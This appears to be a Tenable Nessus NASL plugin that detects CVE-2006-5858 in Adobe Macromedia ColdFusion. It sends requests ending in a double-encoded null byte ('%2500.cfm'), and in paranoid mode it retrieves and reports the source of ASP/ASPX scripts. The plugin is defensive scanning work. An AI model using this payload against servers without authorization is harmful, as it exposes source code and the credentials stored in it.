#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server is affected by an information disclosure
vulnerability. 

Description :

The remote host is running Abobe Macromedia ColdFusion, a product for
developing and deploying web applications. 

The version of ColdFusion installed on the remote host allows an
attacker to view the contents of files not interpreted by ColdFusion
itself and hosted on the affected system.  The problem is due to the
fact that with ColdFusion, URL-encoded filenames are decoded first by
IIS and then again by ColdFusion.  By passing in a filename followed
by a double-encoded null byte and an extension handled by ColdFusion,
such as '.cfm', a remote attacker can may be able to uncover sensitive
information, such as credentials and hostnames contained in scripts,
configuration files, etc. 

See also :

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=466
http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0199.html
http://www.adobe.com/support/security/bulletins/apsb07-02.html

Solution :

Upgrade to ColdFusion MX 7.0.1 if necessary and apply the appropriate
patch as described in the vendor advisory referenced above. 

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(24283);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2006-5858");
  script_bugtraq_id(21978);
  script_xref(name:"OSVDB", value:"32123");

  script_name(english:"ColdFusion Double-Encoded Null Byte Information Disclosure Vulnerability");
  script_summary(english:"Tries to retrieve script source code using ColdFusion");
 
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl", "webmirror.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Check whether it's vulnerable.
url = string("/", substr(SCRIPT_NAME, 0, strlen(SCRIPT_NAME)-6), "-", unixtime(), ".asp");
req = http_get(item:string(url, "%2500.cfm"), port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# If it is...
if (
  "<title>JRun Servlet Error</title>" >< res &&
  string("404 ", url, "</h1>") >< res
)
{
  # Unless we're being paranoid, we're done.
  if (report_paranoia < 2)
  {
    security_warning(port);
    exit(0);
  }
  # Otherwise, try to exploit the flaw to make sure we can get the
  # source code for an ASP or .NET script.
  else {
    max_files = 10;
    files = get_kb_list(string("www/", port, "/content/extensions/asp"));
    if (isnull(files)) files = get_kb_list(string("www/", port, "/content/extensions/aspx"));
    if (isnull(files)) files = make_list("/index.asp", "/Default.asp", "/index.aspx", "/Default.aspx");

    n = 0;
    foreach file (files)
    {
      # Try to get the source.
      req = http_get(item:string(file, "%2500.cfm"), port:port);
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      # If it looks like the source code...
      if (
        (file =~ "\.asp$" && "<%" >< res && "%>" >< res) ||
        (file =~ "\.aspx$" && "<%@ " >< res)
      )
      {
        # Now run the script.
        req = http_get(item:file, port:port);
        res2 = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
        if (res2 == NULL) exit(0);

        # There's a problem if the response does not look like source code this time.
        if (
          (file =~ "\.asp$" && "<%" >!< res2 && "%>" >!< res2) ||
          (file =~ "\.aspx$" && "<%@ " >!< res2)
        )
        {
          report = string(
            desc,
            "\n\n",
            "Plugin output :\n",
            "\n",
            "Here is the source that Nessus was able to retrieve for the URL \n",
            "'", file, "' :\n",
            "\n",
            res
          );
          security_warning(port:port, data:report); 
          exit(0);
        }
      }
      if (n++ > max_files) exit(0);
    }
  }
}
